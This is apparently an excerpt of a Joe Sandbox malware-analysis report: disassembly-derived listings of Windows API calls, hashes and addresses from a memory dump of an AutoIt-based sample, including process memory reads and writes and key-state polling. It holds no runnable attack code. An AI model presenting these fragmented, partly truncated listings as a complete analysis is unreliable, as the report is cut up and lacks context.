                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: efcbf0502f2b6895941cde168376644724b18b63886ee4e6a9e59386e27a5269
                                                              • Instruction ID: a4c656ba251f4604fd26d37ec8af6a13ddf456307c85db96d9b25ae0ee8432f3
                                                              • Opcode Fuzzy Hash: efcbf0502f2b6895941cde168376644724b18b63886ee4e6a9e59386e27a5269
                                                              • Instruction Fuzzy Hash: 0781A1716003009FD724EF29C886F2AB7E5AF99714F14881EF9599B3D2DAB4EC04CB59
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1559183368-0
                                                              • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction ID: b18c6f00eb23dd8b5e2ed11aaa4ea8e60ec089dad47d86c1e1e2dc410515d365
                                                              • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction Fuzzy Hash: 8C511A30A00B09EBCB148E65D85067F77B2AF41326F14872FFC25963C6E7789D588B49
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 004B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004AFDAD,?,?), ref: 004B0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004B00FD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004B013C
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004B0183
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 004B01AF
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004B01BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                              • String ID:
                                                              • API String ID: 3440857362-0
                                                              • Opcode ID: 33ff531982bc89e616aaa54ffa3676b73d156aa878de9b3c0f541709729989c0
                                                              • Instruction ID: 5e578814daa62eee309834d4cd50126ec173471724600a99ef0d85101819e7b5
                                                              • Opcode Fuzzy Hash: 33ff531982bc89e616aaa54ffa3676b73d156aa878de9b3c0f541709729989c0
                                                              • Instruction Fuzzy Hash: 39516D71208204AFD714EF58CC81EABB7E9FF88318F40492EF595872A1DB35E905CB66
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004AD927
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004AD9AA
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004AD9C6
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004ADA07
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004ADA21
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00497896,?,?,00000000), ref: 00435A2C
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00497896,?,?,00000000,?,?), ref: 00435A50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: 00f556488e576b2324f4fac41c84967437c19167e95f972f3ac2a56907396eb8
                                                              • Instruction ID: 3c3356efa7cbc2811293e4b7ff662cf22703a315952e3640fb1249463ee04b4c
                                                              • Opcode Fuzzy Hash: 00f556488e576b2324f4fac41c84967437c19167e95f972f3ac2a56907396eb8
                                                              • Instruction Fuzzy Hash: DB512975A00205DFCB00EFA9C4849AEB7B4FF19314F04816AE85AAB312D738ED46CF55
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0049E61F
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0049E648
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0049E687
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0049E6AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0049E6B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: 1a5d6c79082fc237f71ab62e4d36371e221595ac5f915ef44164a4425438b8c5
                                                              • Instruction ID: ab694512dc93015156489160799cec1eb37182a0ff96fb25fc721653c1d2ee81
                                                              • Opcode Fuzzy Hash: 1a5d6c79082fc237f71ab62e4d36371e221595ac5f915ef44164a4425438b8c5
                                                              • Instruction Fuzzy Hash: E8510A39A00105DFCB05EF65C9819AEBBF5EF49314F1480AAE809AB362CB35ED15DF54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51c919d021ecd504a73058d0dca54cdb1eb4a2b3d6450d009f8d8f20a6dcea4d
                                                              • Instruction ID: 636e4c5aa972f5d438a6c1233cc2438f745126c90c9ed9c87e57a53b2af703f4
                                                              • Opcode Fuzzy Hash: 51c919d021ecd504a73058d0dca54cdb1eb4a2b3d6450d009f8d8f20a6dcea4d
                                                              • Instruction Fuzzy Hash: D241B335904114ABD760DF28CC48FEABBA4EB09310F144266E915A73E1C7389D65DA7A
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00432357
                                                              • ScreenToClient.USER32(004F57B0,?), ref: 00432374
                                                              • GetAsyncKeyState.USER32(00000001), ref: 00432399
                                                              • GetAsyncKeyState.USER32(00000002), ref: 004323A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: 41785b240e6601ae1905b20ac74bbba3f8292ccb75e9e5a7988f482834c64deb
                                                              • Instruction ID: 7036231bce9eaeb2300a3b4c2350970a07d1e8bd268525f1ff6fafc568d54a1e
                                                              • Opcode Fuzzy Hash: 41785b240e6601ae1905b20ac74bbba3f8292ccb75e9e5a7988f482834c64deb
                                                              • Instruction Fuzzy Hash: 54418335604115FBCF199F69CC44AEABB74FB09364F20431BF828D22A0D7789D94DBA6
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004863E7
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00486433
                                                              • TranslateMessage.USER32(?), ref: 0048645C
                                                              • DispatchMessageW.USER32(?), ref: 00486466
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00486475
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                              • String ID:
                                                              • API String ID: 2108273632-0
                                                              • Opcode ID: 191270fb0f4669ae825d20717867bcc8e93864b814db3abb251a2c70cd575988
                                                              • Instruction ID: 3bb6802debbd126dc1f36d43bd20c5b0fd041aec41539aeb0a6b8000066287a6
                                                              • Opcode Fuzzy Hash: 191270fb0f4669ae825d20717867bcc8e93864b814db3abb251a2c70cd575988
                                                              • Instruction Fuzzy Hash: EB31E931900606AFDBA4EFB4CC44FBF7BACAB00700F120A77E915C2260E7299459DB5D
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00488A30
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00488ADA
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00488AE2
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00488AF0
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00488AF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 0048B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0048B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0048B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0048B27F
• _wcsstr.LIBCMT ref: 0048B289
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
  • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
• GetWindowLongW.USER32(?,000000F0), ref: 004BB192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 004BB1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004BB1CF
• GetSystemMetrics.USER32(00000004), ref: 004BB1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,004A0E90,00000000), ref: 004BB216
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00489320
  • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00489352
• __itow.LIBCMT ref: 0048936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00489392
• __itow.LIBCMT ref: 004893A3
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
APIs
• IsWindow.USER32(00000000), ref: 004A5A6E
• GetForegroundWindow.USER32 ref: 004A5A85
• GetDC.USER32(00000000), ref: 004A5AC1
• GetPixel.GDI32(00000000,?,00000003), ref: 004A5ACD
• ReleaseDC.USER32(00000000,00000003), ref: 004A5B08
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0043134D
• SelectObject.GDI32(?,00000000), ref: 0043135C
• BeginPath.GDI32(?), ref: 00431373
• SelectObject.GDI32(?,00000000), ref: 0043139C
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00494ABA
• __beginthreadex.LIBCMT ref: 00494AD8
• MessageBoxW.USER32(?,?,?,?), ref: 00494AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00494B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00494B0A
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0048821E
• GetLastError.KERNEL32(?,00487CE2,?,?,?), ref: 00488228
• GetProcessHeap.KERNEL32(00000008,?,?,00487CE2,?,?,?), ref: 00488237
• HeapAlloc.KERNEL32(00000000,?,00487CE2,?,?,?), ref: 0048823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00488255
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?,?,00487455), ref: 00487127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 00487142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 00487150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?), ref: 00487160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 0048716C
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00495260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0049526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00495276
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00495280
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004952BC
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00488121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0048812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0048813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00488141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00488157
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
                                                              • Opcode ID: 75196eeae92e014963134629ec3caaf34119e69da4f97e8b6a830ea6d70dda33
                                                              • Instruction ID: 0a4b7679591e9dc4cbbb597c268ad85184821e74d22b786ab3861df1e0465896
                                                              • Opcode Fuzzy Hash: 75196eeae92e014963134629ec3caaf34119e69da4f97e8b6a830ea6d70dda33
                                                              • Instruction Fuzzy Hash: DCF0AF70240304BFEB116FA8EC8CE6B3BACEF49754B40053AF949D2260CF609C05DB64
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0048C1F7
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0048C20E
                                                              • MessageBeep.USER32(00000000), ref: 0048C226
                                                              • KillTimer.USER32(?,0000040A), ref: 0048C242
                                                              • EndDialog.USER32(?,00000001), ref: 0048C25C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: 3c04611974d5d904b34c242cf4e46874fbec325c7e972d41f138b9805b70a8d6
                                                              • Instruction ID: e9764b2b53ce4300718ce494a556e9c85823a15bcea673a23acd3f78a4a5366c
                                                              • Opcode Fuzzy Hash: 3c04611974d5d904b34c242cf4e46874fbec325c7e972d41f138b9805b70a8d6
                                                              • Instruction Fuzzy Hash: D601DB30804304A7EB206B64DD8EF9677B8FF00B05F000BBAF946914E0DBF469598B58
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 004313BF
                                                              • StrokeAndFillPath.GDI32(?,?,0046B888,00000000,?), ref: 004313DB
                                                              • SelectObject.GDI32(?,00000000), ref: 004313EE
                                                              • DeleteObject.GDI32 ref: 00431401
                                                              • StrokePath.GDI32(?), ref: 0043141C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: 6a4a7f01cfc87adb5b69478d3cb454d25de67a4520dce794361839c529602d79
                                                              • Instruction ID: 61da84a461c8da0c1701233f6f234e0f6242174dea54229f3f812a48d98d616d
                                                              • Opcode Fuzzy Hash: 6a4a7f01cfc87adb5b69478d3cb454d25de67a4520dce794361839c529602d79
                                                              • Instruction Fuzzy Hash: DCF0EC31004B08EBDB116F2AEC4C7693FA4AB15366F089735E929491F1C73589B9DF5C
                                                              APIs
                                                                • Part of subcall function 00450DB6: std::exception::exception.LIBCMT ref: 00450DEC
                                                                • Part of subcall function 00450DB6: __CxxThrowException@8.LIBCMT ref: 00450E01
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 00437A51: _memmove.LIBCMT ref: 00437AAB
                                                              • __swprintf.LIBCMT ref: 00442ECD
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00442D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 1943609520-557222456
                                                              • Opcode ID: d6f877d34312f01396ea84ead43fceeccd681020b8b43e3f71af73730a3a5d50
                                                              • Instruction ID: 1dc34263f94012b709d36e1440e918c336282e0f4df5ebaf730ddad74a795613
                                                              • Opcode Fuzzy Hash: d6f877d34312f01396ea84ead43fceeccd681020b8b43e3f71af73730a3a5d50
                                                              • Instruction Fuzzy Hash: 3091CE711082019FD714EF25C885C6FB7A9EF89314F00491FF8859B2A2DB78ED48CB5A
                                                              APIs
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                              • CoInitialize.OLE32(00000000), ref: 0049B9BB
                                                              • CoCreateInstance.OLE32(004C2D6C,00000000,00000001,004C2BDC,?), ref: 0049B9D4
                                                              • CoUninitialize.OLE32 ref: 0049B9F1
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: 23d5b609f914a6caf1297c0946d408932be480a31a112d62c6cad5f2ba22fe1a
                                                              • Instruction ID: 7e2349613fdc3028a3f4830c168b7f109766e429df1ab62b0a0a94ae0aa43ee6
                                                              • Opcode Fuzzy Hash: 23d5b609f914a6caf1297c0946d408932be480a31a112d62c6cad5f2ba22fe1a
                                                              • Instruction Fuzzy Hash: 86A143746042019FCB04EF15C984E2ABBE5FF89318F10899EF8999B3A1CB35EC45CB95
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0048B4BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container$%L
                                                              • API String ID: 3565006973-2366359021
                                                              • Opcode ID: da0fb4ec5caf888581ce9e60296cab1105a7eade35b2850f19d445e9fd090c66
                                                              • Instruction ID: 21e3b9cb6a7aa4663f84e7aabda6a67def51b8b80736cdd7ad771571f4894ec5
                                                              • Opcode Fuzzy Hash: da0fb4ec5caf888581ce9e60296cab1105a7eade35b2850f19d445e9fd090c66
                                                              • Instruction Fuzzy Hash: 32916B70600601AFDB54EF65C884B6ABBF4FF49715F20886EE94ACB391DB74E841CB94
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 004550AD
                                                                • Part of subcall function 004600F0: __87except.LIBCMT ref: 0046012B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: e03635919b16bbc0a96a8f1d97758c0878ece793d988709a6f6ff666594c3021
                                                              • Instruction ID: bc6e02dd198f6119336b54460edfc5ad8be06ab2f65cf9b1010ce63d8af4eac8
                                                              • Opcode Fuzzy Hash: e03635919b16bbc0a96a8f1d97758c0878ece793d988709a6f6ff666594c3021
                                                              • Instruction Fuzzy Hash: 17516C6090890287DB117B14C82137F2B909F41B11F2089ABE8D5863DBFE3D8DCC9A8F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: 3cD$_D
                                                              • API String ID: 4104443479-3978952248
                                                              • Opcode ID: cc6d747e10f3322d21a720511b3abaf6fc4be1d717081c66d19a31aa3a86178c
                                                              • Instruction ID: b8e16fb68dd231bc6f82ae239d12eefabbc7a8b1904848a0976dc6b2cc0f2f10
                                                              • Opcode Fuzzy Hash: cc6d747e10f3322d21a720511b3abaf6fc4be1d717081c66d19a31aa3a86178c
                                                              • Instruction Fuzzy Hash: 65516EB0D006199FDB64CF68C884AEEBBB1FF44304F24852EE85AD7350EB34A955CB55
                                                              APIs
                                                                • Part of subcall function 004914BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00489296,?,?,00000034,00000800,?,00000034), ref: 004914E6
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0048983F
                                                                • Part of subcall function 00491487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004892C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004914B1
                                                                • Part of subcall function 004913DE: GetWindowThreadProcessId.USER32(?,?), ref: 00491409
                                                                • Part of subcall function 004913DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0048925A,00000034,?,?,00001004,00000000,00000000), ref: 00491419
                                                                • Part of subcall function 004913DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0048925A,00000034,?,?,00001004,00000000,00000000), ref: 0049142F
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004898AC
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004898F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 1ec0f66b2b6496eeeaf1e073ba5ef5d7e16df9d8c8636171fc3a83632e08730d
